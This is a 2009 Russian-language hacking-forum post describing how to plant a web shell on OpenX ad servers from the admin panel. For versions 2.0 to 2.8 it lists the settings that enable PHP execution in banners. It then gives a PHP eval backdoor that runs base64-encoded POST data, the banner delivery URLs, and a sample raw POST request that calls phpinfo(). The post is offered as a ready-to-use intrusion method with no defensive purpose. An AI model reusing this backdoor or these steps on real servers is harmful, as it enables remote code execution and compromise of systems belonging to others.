
26.10.2009, 05:34
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме: 2375131
Репутация:
1695
|
|
Загрузка шелла
Универсальный способ загрузки шелла.
условия:
+ Доступность на запись файла config.inc.php
Описание:
>> Для ветки OpenX 2.0
1.
В админ панели выбираем
Настройки ->
(вкладка) Главные настройки ->
(выпадающий список "Выберите раздел:") Настройки баннеров ->
(категория) Опции HTML-баннеров ->
Разрешить выполнение PHP-выражений из HTML-баннера
Сохраняем.
>> Для ветки OpenX 2.4
1.
В админ панели выбираем
Настройки ->
(вкладка) Главные настройки ->
(выпадающий список "Выберите раздел:") Настройки доставки ->
(категория) Настройки доставки баннеров ->
Разрешить исполнение кода PHP
Сохраняем.
>> Для ветки OpenX 2.6
1.
Переходим в админ панель, в правом верхнем углу ->
(Работает как) Administrator account
В админ панели выбираем
Мой аккуант ->
(вкладка) Общие настройки ->
(выпадающий список "Выберите раздел:") Настройки кэширования доставки ->
(категория) Настройки кэширования доставки ->
Разрешить исполнение кода PHP
Сохраняем.
>> Для ветки OpenX 2.8
1.
Переходим в админ панель, в правом верхнем углу ->
(Работает как) Administrator account
В админ панели выбираем
Конфигурация ->
(категория) Общие настройки ->
Настройки доставки баннеров ->
(категория) Настройки доставки баннеров ->
Разрешить исполнение кода PHP
Сохраняем.
2.
Добавляем баннер
Выбираем (выпадающий список: Тип баннера) HTML-баннер ->
В поле HTML-баннер ->
<?php
if (!empty($_POST['e']))
@eval(base64_decode($_POST['e']));
?>
test
Сохраняем
3.
Узнаем id созданного баннера, его можно увидеть в названии баннера.
4.
Передаем, нужные нам параметры:
http://host/adcontent.php?bannerid=id //OpenX 2.0
http://host/www/delivery/ac.php?bannerid=id //OpenX > 2.0
id - номер вашего баннера
Пример запроса для phpinfo() :
POST /www/delivery/ac.php?bannerid=id HTTP/1.1
Host: host
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
e=cGhwaW5mbygpOw==
Хочу заметить что в данном случае удобно использовать плагин для firefox - HackBar
Последний раз редактировалось (Dm); 01.11.2009 в 15:13..
|
|
|